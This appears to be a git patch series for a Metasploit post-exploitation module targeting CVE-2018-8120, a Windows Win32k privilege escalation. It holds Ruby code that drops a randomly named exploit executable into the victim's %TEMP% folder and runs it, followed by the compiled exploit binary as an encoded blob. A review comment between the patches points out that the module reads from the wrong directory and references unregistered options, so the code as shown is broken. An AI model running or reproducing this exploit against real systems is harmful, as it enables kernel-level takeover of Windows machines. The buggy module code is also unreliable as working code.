From 26ebd17954d20c0c8e2d9ba9a981217da168a4ef Mon Sep 17 00:00:00 2001
From: Dhiraj Mishra
Date: Tue, 18 Sep 2018 12:37:57 +0530
Subject: [PATCH 01/39] WIP: CVE-2018-8120
---
 .../escalate/ms18_8120_win32k_privsec.rb | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
new file mode 100644
index 0000000000..0ae4d589ad
--- /dev/null
+++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb
@@ -0,0 +1,86 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+ include Msf::Post::File
+ include Msf::Post::Windows::Registry
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Win32k Elevation of Privilege Vulnerability',
+ 'Description' => %q{
+ This module exploits elevation of privilege vulnerability exists in Windows when the Win32k
+ component fails to properly handle objects in memory. An attacker who successfully exploited
+ this vulnerability could run arbitrary code in kernel mode. An attacker could then install
+ programs; view, change, or delete data; or create new accounts with full user rights.},
+ 'References' =>
+ [
+ ['CVE', '2018-8120'],
+ ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'],
+ ['URL', 'https://github.com/unamer/CVE-2018-8120']
+ ],
+ 'Author' =>
+ [
+ 'unamer', # Exploit PoC
+ 'Anton Cherepanov', # Vulnerability discovery
+ 'Dhiraj Mishra ' # Metasploit module
+ ],
+ 'DisclosureDate' => 'Aug 05 2018',
+ 'Arch' => [ARCH_X64],
+ 'SessionTypes' => ['meterpreter'],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']),
+ OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ])
+ ])
+ end
+
+ def write_exe_to_target(rexe, rexename)
+ begin
+ print_warning("writing to %TEMP%")
+ temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
+ write_file_to_target(temprexe,rexe)
+ end
+ print_good("Persistent Script written to #{temprexe}")
+ temprexe
+ end
+
+ def write_file_to_target(temprexe,rexe)
+ fd = session.fs.file.new(temprexe, "wb")
+ fd.write(rexe)
+ fd.close
+ end
+
+ def create_payload_from_file(exec)
+ print_status("Reading Payload from file #{exec}")
+ ::IO.read(exec)
+ end
+
+ def run
+ rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe"
+ print_status("exe name is: #{rexename}")
+ poccmd = datastore['POCCMD']
+ cmdcheck = datastore['CMDCHECK']
+
+ rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe')
+ raw = create_payload_from_file rexe
+ script_on_target = write_exe_to_target(raw, rexename)
+
+ print_status('Starting module...')
+ print_line('')
+
+ command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
+ print_status("Location of CVE-2018-8120.exe is: #{command}")
+
+ print_status("Executing command : #{command}")
+ command_output = cmd_exec(command)
+ print_line(command_output)
+ print_line('')
+
+ end
+end
From 89b0ac6f874533b12429df6fc6ad3c2e79aff854 Mon Sep 17 00:00:00 2001
From: Dhiraj Mishra
Date: Tue, 18 Sep 2018 14:59:43 +0530
Subject: [PATCH 02/39] Adding suport files
---
 data/exploits/CVE-2018-8120/CVE-2018-8120.exe | Bin 0 -> 95744 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 data/exploits/CVE-2018-8120/CVE-2018-8120.exe
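Review bot: In `run` of ms18_8120_win32k_privsec.rb the data-file path is built with the directory `'CVE-2018-0824'`, but the following patch in this series adds the file under `data/exploits/CVE-2018-8120/`, so `::IO.read` in `create_payload_from_file` would raise `Errno::ENOENT`. The line should read `rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe')`. In the same method `POCCMD` is registered as required but its value is never used, `datastore['CMDCHECK']` reads an option that is never registered, and `READFILE` is registered but unused; `script_on_target` is also assigned and then ignored while the same path is rebuilt into `command`. `create_payload_from_file` should read the executable with `::File.binread(exec)` so the bytes are not passed through text-mode handling, and `write_file_to_target` should close `fd` in an `ensure` so a failed write does not leave the handle open.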
diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120.exe new file mode 100644 index 0000000000000000000000000000000000000000..036dd38a1307ee9a5505822a095c2bee484a57f0 GIT binary patch literal 95744 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%0ArEwM5#f#?;j`@|qwFLeNn(I_Jw7EZT2k~x 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 